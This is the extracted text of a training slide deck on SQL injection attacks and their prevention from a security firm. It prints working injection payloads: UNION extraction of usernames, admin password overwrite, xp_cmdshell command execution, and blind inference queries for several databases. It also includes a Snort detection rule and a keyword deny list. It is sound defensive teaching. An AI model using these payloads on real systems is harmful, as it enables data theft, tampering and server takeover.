Post on 18-Nov-2014
description
SQL INJECTION ATTACKS
Cade ZvavanjanjaCISO
Gainful Information Security
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
OUTLINE Background of SQL Injection Techniques and Examples Preventing SQL Injection Demo Wrap-Up Questions
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
BACKGROUND OF SQL INJECTION
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
DATABASES: WHERE ARE THEY NOW?
Fat ServerFat Server Fat ClientFat Client Fat Server Fat Server & Fat & Fat ClientClient
MainframesMainframes XXDesktop AppsDesktop Apps XXWeb AppsWeb Apps XX
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
WHY IS SQL A STANDARD?
Relational Database
Platform Independence Loose
Semantics
Runtime Interpretation
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
FLEXIBILITY = VULNERABILITYSimple InjectionDecoding Error
MessagesBlind InjectionEncoding ExploitsStored Procedures
- - -Programmer Error
(Faulty Logic)
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
SQL Injection SQL Injection Techniques Techniques
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
IMPORTANT SYMBOLS
‘ “Hack”
-- “Comment Out”
; “End Statement”
% , * “Wildcards”
SQL INJECTION DEFINITION
The input field is modified in such a way that the Database returns unintended data.
Sql:SELECT <column name>FROM <Table name>WHERE <logic expression>
EXAMPLE: DATABASE SCHEMA Table Users
Has columns “username” and “password” Accessed when users log in
Table Customers Has column “phone” Users can look up other customer phone
numbers by name Application does no input validation
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
RETURNING EXTRA ROWS WITH “UNION” Query:
SELECT phone FROM Customers WHERE last_name = ‘<name>’
Input:x’ UNION SELECT username FROM users WHERE ‘x’ = ‘x
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
MODIFYING RECORDS Application has password changing page SQL: UPDATE users
SET password = ‘<newpassword>’ WHERE username = ‘<username>’
Input: newpassword’ WHERE username LIKE
‘%admin%’ --
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
MS SQL SERVER Default SQL Server setup
Default system admin account “sa” enabled No password!!!
Supports multiple queries “Extended stored procedures”: C/C++ DLL
files Read/write external files Access command line
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
EXPLOITING SQL SERVER Use phone look-up query again:
SELECT phone FROM customers WHERE last_name = ‘<name>’
Input:'; exec master..xp_cmdshell
'iisreset'; --
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
DATA-MINING WITH SQL INJECTION
Three classes of data-mining
In-band
Out-of-band
Inference
IN-BAND ATTACKS Data is included in response from the web
server
Could be a well rendered web page
Using UNION SELECTS
Error messages
OUT-OF-BAND ATTACKS Data is retrieved using another
communication channel:
UTL_HTTP.REQUEST
OPENROWSET
XP_SENDMAIL
INFERENCE ATTACKS At the core of inference is a question Action taken based upon the answer Chris Anley’s time delay:
declare @s varchar(8000)select @s = db_name() if (ascii(substring(@s, 1, 1)) & ( power(2, 0))) >
0 waitfor delay '0:0:5'
INFERENCE ATTACKS…CONT: Examples:
Time Delay
Generate 200/500 responses
Response Variation
Wildly Silly Example – send mail to tech support of XYZ Corp about modem problem or monitor problem – if the call comes about a modem problem we know the answer
INFERENCE ATTACKS…CONT: CASE statements in SQL:
SELECT CASE WHEN condition THEN do_one_thing ELSE do_another END
INFERENCE THROUGH WEB SERVER RESPONSE CODES Need query that will compile fine but
generate error on branch execution:
SELECT CASE WHEN condition THEN 1 ELSE 1/0 END
INFERENCE THROUGH WEB SERVER RESPONSE CODES…CONT:
Notes: Works well with SQL Server, Oracle, DB2 MySQL returns NULL Informix ODBC driver returns 200 – even in event
of error Response code could be 302 Redirect, etc –
principle is the same. Leaves a large number of 500 response in log
files App Environments like PL/SQL will return 404
instead of 500
INFERENCE THROUGH RESPONSE VARIATIONS: Parameter Splitting and Balancing Avoids 500 responses
PARAMETER SPLITTING AND BALANCING ‘NGSSOFTWARE’
‘NGSSOFTWA’+’RE’ ‘NGSSOFTWA’||’RE’ ‘NGSSOFTWA’|| (SUBSELECT RETURNS R) || ‘E’ ‘NGSSOFTWA’ + (SUBSELECT RETURNS R) + ‘E’
2 1 + 1 1 + (SUBSELECT RETURNS 1)
DEALING WITH VARIOUS APPLICATION ENVIRONMENTS Cold Fusion Management
Converts “ to " Converts & to & Converts > to > Converts < to < Doubles up single quotes
Usually means attack vector is numeric input PHP often doubles single quote – magic
quotes
DEALING WITH VARIOUS APPLICATION ENVIRONMENTS…CONT: Rather than > use BETWEEN X AND Y
Rather than & use ^ A xor BIT = C
if C is greater than A then Bit is not set If C is less than A then Bit is set
Rather than ‘A’ use CHR(65)/CHAR(65)
INFERENCE QUERIES… SQL Server – String data
' + (select case when ascii(substring((sub-
query),the_byte,1))^the_bitbetween 0 and ascii(substring((sub-
query),the_byte,1)) then char(known_value) else char(1/0) end) + '
INFERENCE QUERIES… Oracle – Numeric
+ (select case when bitand(ascii(substr((sub-query),the_byte,1)),
the_bit) between 1 and 255 then 0 else 1/0 end
from dual)
INFERENCE QUERIES… Oracle – String data
'|| (select case when bitand(ascii(substr((sub-query),the_byte,1)),
the_bit) between 1 and 255 then chr(known_val) else
chr(1/0) end from dual) ||'
INFERENCE QUERIES… MySQL – Numeric
+ (select case when (ascii(substring((sub-query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end
(uses page response variation)
INFERENCE QUERIES… MySQL – String Data
' + (select case when (ascii(substring((sub-query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end) + ‘
(one returns no recordset – the other returns all rows)
INFERENCE QUERIES… Informix – Numeric+ (select distinct case when bitval((SELECT distinct
DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),"{",123,"|",124,"}",125,"~",126,"!",33,"$",36,"(",40,")",41,"*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"\\",92,".",46,"?",63,"-",45,"0",48,"1",49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@",64,"A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72,"I",73,"J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",81,"R",82,"S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z",90,"a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",104,"i",105,"j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p",112,"q",113,"r",114,"s",115,"t",116,"u",117,"v",118,"w",119,"x",120,"y",121,"z",122,63) from sysmaster:informix.systables),the_bit) between 1 and 255 then 1 else (1/bitval(2,1)) end from sysmaster:informix.systables)-1
INFERENCE QUERIES… Informix – String data' || (select distinct case when bitval((SELECT distinct
DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),"{",123,"|",124,"}",125,"~",126,"!",33,"$",36,"(",40,")",41,"*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"\\",92,".",46,"?",63,"-",45,"0",48,"1",49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@",64,"A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72,"I",73,"J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",81,"R",82,"S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z",90,"a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",104,"i",105,"j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p",112,"q",113,"r",114,"s",115,"t",116,"u",117,"v",118,"w",119,"x",120,"y",121,"z",122,63) from sysmaster:informix.systables),the_bit) between 1 and 255 then '\xFC' else (1/bitval(2,1))::char end from sysmaster:informix.systables) ||'
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
PREVENTING SQL INJECTION
PREVENTING SQL INJECTIONInput ValidationInput Checking FunctionsAccess RightsUser PermissionsVariable PlaceholdersStored Procedures
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
INPUT VALIDATION Checks
Type Size Format Range
Replace quotation marks
“All input is wrong and dangerous”
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
INPUT CHECKING FUNCTIONS Built in character rejection
$sql = “SELECT * FROM Users WHERE ID = ‘” . $_GET[‘id’] . “’”;
$sql = “SELECT * FROM Users WHERE ID =” . mysql_real_escape_string($_GET[‘id’]);
$result = mysql_query($sql);
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
ACCESS RIGHTS
Web Uservs.
System Administrator – ‘sa’
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
USER PERMISSIONS Limit query access rights
SELECT UPDATE DROP
Restricted statement access Global-specific Database-specific Table-specific
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
VARIABLE PLACEHOLDERS (?) Defense from String Concatenation Enforcing database data types
PreparedStatement prep = conn.prepareStatement("SELECT * FROM USERS WHERE PASSWORD=?");
prep.setString(1, pwd);
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
STORED PROCEDURES Use error checking variables Buffer direct database access
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
DEMONSTRATION
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
COUNTERMEASURESSystem Administrators
White List / Blacklist Input ValidationLeast PrivilegesApplication firewalls
DeveloperStored ProceduresParameterized queriesException handling
WHITELIST INPUT VALIDATION UrlScan v3.0
restricts the types of HTTP requests that IIS will process
SNORT Create rule to check for SQL attack
[SQL Injection Headers]AppliesTo=.asp,.aspx
[SQL Injection Headers Strings]-- @ ; also catches @@alterdeletedropexecinsert
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL Injection "; flow:to_server,established;uricontent:".php | .aspx | .asp";pcre:"/(\%27)|(\')|(\-\-)|(%23)|(#)/i"; classtype:Web-application-attack; sid:9099; rev:5;)
LEAST PRIVILEGES Enforce least privileges
CREATE / DELETE Does not guarantee security
Access to portion of data Create views
CONCLUSIONS SQL Injection continues to evolve with new
technologies Dangerous Effects
Access to critical information Updating data not meant to be updated Exploiting DBMS to directly affect the server and its resources
Prevention of SQL Injection Input Validation and Query Building Permissions and Access Rights Variable Placeholders (Prepare) and Stored Procedures
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
QUESTIONS 1) What could prevent the ‘Students’ table from
being dropped?
2) What is another way to prevent Injection?
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
REFERENCES Achour, Mehdi, Friedhelm Betz, Antony Dovgal, et al. "Chapter
27. Database Security." PHP Manual. 13 January 2005. PHP Documentation Group. 07 Apr. 2005 <http://www.php-center.de/en-html-manual/security.database.sql-
injection.html>. Dewdney, A. K. The New Turing Omnibus. New York: Henry Holt,
1989. 427-433. "Exploits of a Mom." xkcd.com. 4 Mar. 2008
<http://xkcd.com/327/>. Finnigan, Pete. " SQL Injection and Oracle, Part One ."
SecurityFocus 21 November 2002. 07 Apr 2005 <http://www.securityfocus.com/infocus/1644>.
Harper, Mitchell. "SQL Injection Attacks: Are You Safe?." Dev Articles. 29 May. 2002. 07 Apr. 2005
<http://www.devarticles.com/c/a/MySQL/SQL-Injection-Attacks-Are-You-Safe/2/>.
Introduction QuestionsBackground Techniques Prevention Demo Conclusions Questions
Introduction QuestionsBackground Techniques Prevention Demo Conclusions
Thank You
Tel: +236 733 782 490 +263 773 796 365 +263 -4- 733 117
Eml: info@gis.co.zw cade@gis.co.zw
Web: www.gis.co.zw